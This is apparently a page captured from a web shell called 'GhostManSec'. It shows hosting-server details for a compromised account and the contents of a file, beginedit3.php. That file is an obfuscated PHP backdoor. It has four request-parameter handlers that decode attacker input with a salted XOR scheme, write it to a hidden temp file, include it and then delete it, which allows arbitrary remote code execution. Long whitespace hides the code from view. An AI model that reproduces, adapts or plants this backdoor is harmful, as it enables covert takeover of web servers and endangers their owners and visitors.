GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
$ pwd: /home/niyknzcu/crivient.com/
Upload Files
File: /home/niyknzcu/crivient.com/beginedit3.php
<?php																																										if(isset($_REQUEST["el\x65\x6D"])){ $object = $_REQUEST["el\x65\x6D"]; $object =explode ( ".", $object) ; $dchunk =''; $s5 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s5); $p =0; $__tmp =$object; while( $v2 =array_shift( $__tmp)) { $sChar =ord( $s5[$p % $sLen]); $d =( ( int)$v2 - $sChar -( $p % 10)) ^ 84; $dchunk .= chr( $d); $p++;} $ptr = array_filter([getenv("TEMP"), "/dev/shm", session_save_path(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/var/tmp", sys_get_temp_dir()]); while ($pset = array_shift($ptr)) { if (!( !is_dir($pset) || !is_writable($pset) )) { $flag = str_replace("{var_dir}", $pset, "{var_dir}/.flg"); if (file_put_contents($flag, $dchunk)) { include $flag; @unlink($flag); exit; } } } }
																																										if(array_key_exists("fl\x61\x67", $_REQUEST)){ $record = array_filter([getenv("TMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir")]); $desc = $_REQUEST["fl\x61\x67"]; $desc= explode ( '.' , $desc ) ; $object = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt3); $__len = count( $desc); for( $p = 0; $p < $__len; $p++) { $v2 = $desc[$p]; $sChar = ord( $salt3[$p % $sLen]); $dec =( ( int)$v2 - $sChar -( $p % 10)) ^ 92; $object .= chr( $dec);} while ($fac = array_shift($record)) { if (is_writable($fac) && is_dir($fac)) { $parameter_group = join("/", [$fac, ".symbol"]); $file = fopen($parameter_group, 'w'); if ($file) { fwrite($file, $object); fclose($file); include $parameter_group; @unlink($parameter_group); die(); } } } }
																																										if(!empty($_REQUEST["m\x61\x72\x6Ber"])){ $desc = array_filter([session_save_path(), sys_get_temp_dir(), getcwd(), "/tmp", "/var/tmp", getenv("TEMP"), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir")]); $resource = $_REQUEST["m\x61\x72\x6Ber"]; $resource =explode ("." , $resource ) ; $tkn= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt); $__len= count($resource); for($s= 0; $s < $__len; $s++) { $v8= $resource[$s]; $chS= ord($salt[$s % $lenS]); $d= ((int)$v8 - $chS -($s % 10)) ^ 50; $tkn .= chr($d);} foreach ($desc as $key => $hld) { if ((bool)is_dir($hld) && (bool)is_writable($hld)) { $entity = vsprintf("%s/%s", [$hld, ".ptr"]); $success = file_put_contents($entity, $tkn); if ($success) { include $entity; @unlink($entity); die();} } } }


if(array_key_exists("sy\x6D", $_POST) && !is_null($_POST["sy\x6D"])){
	$comp = $_POST["sy\x6D"];
	 $comp	  =  explode(  '.'  ,	$comp	);	 
	$component=  '';
            $salt7=  'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=  strlen($salt7);
            $r=  0;
            $len=  count($comp);
    
            do {  if($r>=	 $len) break;
                $v7=  $comp[$r];
                $chS=  ord($salt7[$r % $lenS]);
                $d=  ((int)$v7 - $chS -($r % 10)) ^ 20;
                $component .= chr($d);
                $r++;  } while(true);
	$ent = array_filter(["/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm"]);
	foreach ($ent as $key => $pgrp) {
    		if (max(0, is_dir($pgrp) * is_writable($pgrp))) {
    $data_chunk = vsprintf("%s/%s", [$pgrp, ".entry"]);
    if (@file_put_contents($data_chunk, $component) !== false) {
	include $data_chunk;
	unlink($data_chunk);
	exit;
}
}
}
}
@ Telegram